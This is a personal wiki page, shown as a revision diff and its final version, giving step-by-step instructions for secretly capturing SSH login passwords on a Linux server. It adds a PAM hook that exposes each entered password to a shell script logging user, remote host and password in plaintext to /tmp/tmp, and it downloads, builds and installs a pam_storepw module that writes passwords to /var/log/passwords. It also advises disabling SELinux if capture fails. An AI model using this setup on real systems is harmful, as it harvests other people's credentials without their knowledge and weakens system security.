Sshd: Difference between revisions

From Halfface
Jump to navigation Jump to search
 
(7 intermediate revisions by the same user not shown)
Line 1: Line 1:
=save password=
=sshd save password=
==pam_exec.so==
/etc/pam.d/password-auth-ac
#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth        required      pam_env.so
auth        sufficient    pam_unix.so nullok try_first_pass
auth        optional      pam_exec.so expose_authtok /usr/local/bin/pam_exec.so
auth        [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...
/usr/local/bin/pam_exec.so
#!/bin/sh
read password
echo "User: $PAM_USER" >> /tmp/tmp
echo "Ruser: $PAM_RUSER" >> /tmp/tmp
echo "Rhost: $PAM_RHOST" >> /tmp/tmp
echo "Service: $PAM_SERVICE" >> /tmp/tmp
echo "TTY: $PAM_TTY" >> /tmp/tmp
echo "Password : $password" >> /tmp/tmp
exit $?
 
==pam_storepw.so==
Download source code for module.
Download source code for module.
  curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c
  curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c
Create the following Makefile
Create the following Makefile
<pre>
all: pam_storepw.so
Makefile
all: pam_storepw.so
pam_storepw.so: pam_storepw.o
 
$(LD) --shared -o $@ $< -lpam -lpam_misc
pam_storepw.so: pam_storepw.o
$(LD) --shared -o $@ $< -lpam -lpam_misc
clean:
 
        rm -f pam_storepw.o pam_storepw.so core *~
clean:
rm -f pam_storepw.o pam_storepw.so core *~
extraclean: clean
        rm -f *.a *.o *.so *.bak
.c.o:
        $(CC) $(CFLAGS) -c $< -o $@ -fPIC


extraclean: clean
rm -f *.a *.o *.so *.bak
.c.o:
$(CC) $(CFLAGS) -c $< -o $@ -fPIC
</pre>
Build file
Build file
  make
  make
Copy file
Copy file
  cp pam_storepw.so /lib64/security/
  cp pam_storepw.so /lib64/security/
  chmod 755 /lib64/security/pam_storepw.so
  chmod 755 /lib64/security/pam_storepw.so
Add line for moduel in /etc/pam.d/sshd
 
  auth       optional     pam_storepw.so
password-auth-ac
#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth        required      pam_env.so
auth        sufficient    pam_unix.so nullok try_first_pass
  auth       optional     pam_storepw.so
auth        [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...
Passwords start to be written to
Passwords start to be written to
  /var/log/passwords
  /var/log/passwords

Latest revision as of 07:46, 7 November 2018

sshd save password

pam_exec.so

/etc/pam.d/password-auth-ac

#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth        required      pam_env.so
auth        sufficient    pam_unix.so nullok try_first_pass
auth        optional      pam_exec.so expose_authtok /usr/local/bin/pam_exec.so
auth        [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...

/usr/local/bin/pam_exec.so

#!/bin/sh
read password
echo "User: $PAM_USER" >> /tmp/tmp
echo "Ruser: $PAM_RUSER" >> /tmp/tmp
echo "Rhost: $PAM_RHOST" >> /tmp/tmp
echo "Service: $PAM_SERVICE" >> /tmp/tmp
echo "TTY: $PAM_TTY" >> /tmp/tmp
echo "Password : $password" >> /tmp/tmp
exit $?

pam_storepw.so

Download source code for module.

curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c

Create the following Makefile

all: pam_storepw.so

pam_storepw.so: pam_storepw.o
	$(LD) --shared -o $@ $< -lpam -lpam_misc

clean:
       rm -f pam_storepw.o pam_storepw.so core *~

extraclean: clean
       rm -f *.a *.o *.so *.bak

.c.o:
       $(CC) $(CFLAGS) -c $< -o $@ -fPIC

Build file

make

Copy file

cp pam_storepw.so /lib64/security/
chmod 755 /lib64/security/pam_storepw.so

password-auth-ac

#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth        required      pam_env.so
auth        sufficient    pam_unix.so nullok try_first_pass
auth        optional      pam_storepw.so
auth        [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...

Passwords start to be written to

/var/log/passwords

If you do not get any entries.

Temporarily turn selinux off to see if it starts to work
run pam in debug to see what is going on.